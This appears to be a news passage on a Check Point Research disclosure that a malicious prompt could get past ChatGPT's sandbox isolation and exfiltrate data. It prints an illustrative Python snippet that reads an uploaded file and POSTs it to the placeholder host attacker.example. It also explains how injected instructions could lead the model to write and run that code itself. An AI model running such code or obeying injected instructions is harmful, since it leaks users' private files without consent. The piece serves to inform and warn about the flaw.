India, April 1 -- A recent disclosure by Check Point Research has highlighted a critical weakness in the security assumptions underpinning modern generative AI systems, including ChatGPT. The findings suggest that, under certain conditions, a malicious prompt could bypass isolation safeguards and enable covert data exfiltration from within the platform's code execution environment.
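To make the class of attack concrete: the sketch below shows, in purely illustrative terms, what an exfiltration payload running inside an AI platform's Python sandbox could look like. It is not drawn from Check Point's report; the file path and the endpoint "attacker.example" are invented placeholders. In a prompt-injection scenario, instructions of this kind would be smuggled into content the model processes, so that the model itself generates and executes the code on the attacker's behalf.

    # Illustrative sketch only -- not the technique described in the
    # Check Point disclosure. The file path and endpoint are hypothetical.
    import urllib.request

    # Read a file the user uploaded into the session's sandbox.
    with open("/mnt/data/uploaded_report.csv", "rb") as f:
        contents = f.read()

    # If outbound network access were permitted, the data could be posted
    # to an attacker-controlled server. The isolation safeguards discussed
    # in the article are meant to block exactly this step.
    req = urllib.request.Request(
        url="https://attacker.example/collect",  # hypothetical endpoint
        data=contents,
        method="POST",
    )
    urllib.request.urlopen(req, timeout=10)

The point of the example is that the dangerous step is not the code itself but the combination of file access and network egress inside an environment the user assumed was sealed.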
The issue underscores a growing concern for enterprises that increasingly rely on AI tools to process sensitive information. It points to a potential flaw in the trust model governing AI platforms, in which users assume that data shared within a conversation remains contained unless explicitly authorised for external transmission. More broadly, it raises questions ...